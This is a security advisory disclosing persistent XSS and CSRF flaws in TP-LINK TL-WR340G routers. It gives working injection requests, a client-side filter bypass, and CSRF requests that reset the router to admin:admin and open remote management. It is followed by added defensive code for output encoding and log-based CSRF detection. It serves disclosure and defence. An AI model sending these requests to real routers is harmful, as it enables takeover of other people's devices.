#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
#Date: 01.07.14
#Vendor: TP-LINK
#Affected versions: TL-WR340G/TL-WR340GD
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
#Contact: smash [at] devilteam.pl

Persistent Cross Site Scripting vulnerabilities exist because of poor parameter filtering. The submitted value is stored in a JavaScript array on the settings page; since it is neither validated nor escaped, JavaScript code can be injected. It is executed whenever a user visits the affected settings page.

Because there is no CSRF prevention, the router can be compromised. An attacker may force the user to restore factory default settings and then to turn on remote management; as a result, the attacker is able to log in using the default username and password (admin:admin).

Config file - 192.168.1.1/userRpm/config.bin

#1 - Cross Site Scripting

a) Persistent XSS in Network > WAN Settings

Vulnerable parameter - hostName.

Request:

GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:

HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var dhcpInf = new Array(
1,
(...)
"</script><script>alert(123)</script>",
0,0 );
</SCRIPT>
(...)

b) Persistent XSS in Wireless Settings

Vulnerable parameter - ssid.

Request:

GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E&region=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:

HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
0,0 );
</SCRIPT>
(...)

c) Persistent XSS in DHCP Settings

Vulnerable parameter - domain.

Request:

GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm

Response:

HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1, "192.168.1.100", "192.168.1.199", 120, "0.0.0.0", "</script><xssed>'\"", "0.0.0.0", "0.0.0.0", 1, 1,
0,0 );
</SCRIPT>
(...)

d) Persistent XSS in Security > Domain Filtering

Vulnerable parameter - domain; the value is validated client-side by JavaScript to reject illegal characters in a domain name. This filtering is bypassed by sending the raw HTTP request directly.

Request:

GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:

HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var domainFilterList = new Array(
"0000-2400", "hm</script><xssed>'\"", 1,
0,0 );
</SCRIPT>
(...)

e) Persistent XSS in Dynamic DNS Settings

Vulnerable parameters - username & cliUrl.

Request:

GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:

HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"", "", "</script><script>alert(123)</script>", 0, 0, 2, 2, 0, 1,
0,0 );
</SCRIPT>
(...)

#2 - CSRF

a) Change LAN IP

The lanip parameter holds the new LAN IP address.

GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
Host: 192.168.1.1

b) Change remote management settings

GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1

c) Clear syslog

GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
Host: 192.168.1.1

d) Reboot device

GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
Host: 192.168.1.1

e) Restore factory defaults (admin:admin)

GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
Host: 192.168.1
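The XSS cases in #1 all share one root cause: a user value is written into a JavaScript array literal inside a script block with at most the double quote escaped, so "</script>" terminates the block early. The following is an added example, not code from the advisory or from the router firmware; it reproduces that string context and shows the encoding that prevents the breakout, with a check a reviewer can run over rendered output. All function and variable names are this example's own.

```javascript
// Added example, not code from the advisory or the router firmware. It
// reproduces the string context the advisory shows (a value dropped into a
// JavaScript array literal inside <SCRIPT>) and the encoding that would have
// prevented the breakout. Function and variable names are this example's own.

// Vulnerable rendering: only double quotes are escaped, as in the
// LanDhcpServerRpm.htm response ('"' became '\"', '</script>' stayed).
function renderVulnerable(values) {
  const items = values.map(v =>
    typeof v === "string" ? '"' + v.replace(/"/g, '\\"') + '"' : String(v));
  return "<script>var para = new Array(" + items.join(", ") + ");</script>";
}

// Hardened JS string literal: every character that could end the string or
// the script element is emitted as a \uXXXX escape. The browser's HTML
// tokenizer ends a script block at the first "</script", whatever the JS
// context, so "<" and ">" must never reach the output literally.
function jsStringLiteral(s) {
  return '"' + s.replace(/[\\"'<>&\u2028\u2029\r\n]/g, c =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")) + '"';
}

function renderHardened(values) {
  const items = values.map(v =>
    typeof v === "string" ? jsStringLiteral(v) : String(v));
  return "<script>var para = new Array(" + items.join(", ") + ");</script>";
}

// Review check: does the script body contain a premature terminator? The
// body is everything between the opening tag and the last closing tag, so an
// injected "</script>" in the middle is caught.
function scriptBreakout(html) {
  const body = html.slice(html.indexOf(">") + 1, html.lastIndexOf("</script>"));
  return /<\/script/i.test(body);
}

// The hostName payload from the advisory, used here as a constructed input.
const HOSTNAME_PAYLOAD = "</script><script>alert(123)</script>";
```

The hardened literal is still valid JSON, so the value round-trips unchanged on the client; escaping "/" as "\/" would also work but \uXXXX covers "<", ">", "&" and the U+2028/U+2029 line terminators in one rule.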
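The CSRF requests in #2 are plain GETs with no token, so the only trace that distinguishes a cross-site trigger from an administrator's own click is the Referer. The following is an added example, not part of the advisory: a log-side check that flags submissions to the listed state-changing pages that did not come from the router's own UI. The access log lines are constructed in combined log format for this example (the router itself does not log this way); ROUTER_ORIGIN and the function names are this example's own.

```javascript
// Added example, not part of the advisory. Flags state-changing GETs from #2
// that were not navigated to from the router's own pages. The log lines are
// constructed in combined log format; ROUTER_ORIGIN and names are assumptions.
const ROUTER_ORIGIN = "http://192.168.1.1";
const STATE_CHANGING = new Set([
  "/userRpm/NetworkLanCfgRpm.htm",
  "/userRpm/ManageControlRpm.htm",
  "/userRpm/SystemLogRpm.htm",
  "/userRpm/SysRebootRpm.htm",
  "/userRpm/RestoreDefaultCfgRpm.htm",
]);

// client ident user [time] "method target proto" status bytes "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;
function parseLine(line) {
  const m = LINE_RE.exec(line);
  return m && { client: m[1], method: m[2], target: m[3], status: m[4], referer: m[5] };
}

// A request to one of these pages is flagged when it actually submits
// something (it carries a query string: Save=, Reboot=, Restorefactory=,
// Clearlog=) and was not navigated to from the router's own UI. A missing or
// foreign Referer is what a cross-site page produces.
function isLikelyCsrf(req) {
  const [path, query] = req.target.split("?");
  if (!STATE_CHANGING.has(path) || !query) return false;
  return !req.referer.startsWith(ROUTER_ORIGIN + "/");
}

function findCsrfCandidates(logText) {
  return logText.split("\n").map(parseLine)
    .filter(r => r && isLikelyCsrf(r)).map(r => r.target);
}

// Constructed sample: a legitimate save from the admin UI, a plain page view,
// a factory reset triggered from a third-party page, a reboot with no Referer.
const SAMPLE_LOG = [
  '192.168.1.100 - - [01/Jul/2014:10:00:01 +0100] "GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.1&lanmask=255.255.255.0&Save=Save HTTP/1.1" 200 512 "http://192.168.1.1/userRpm/NetworkLanCfgRpm.htm" "Mozilla/5.0"',
  '192.168.1.100 - - [01/Jul/2014:10:00:05 +0100] "GET /userRpm/ManageControlRpm.htm HTTP/1.1" 200 512 "http://192.168.1.1/userRpm/NetworkLanCfgRpm.htm" "Mozilla/5.0"',
  '192.168.1.100 - - [01/Jul/2014:10:02:13 +0100] "GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1" 200 512 "http://example.invalid/page.html" "Mozilla/5.0"',
  '192.168.1.100 - - [01/Jul/2014:10:02:14 +0100] "GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
].join("\n");
```

Browsers and proxies may strip the Referer for privacy, so a hit is a lead to correlate with the admin's session, not proof on its own; the durable fix is a per-session token checked on every state-changing request.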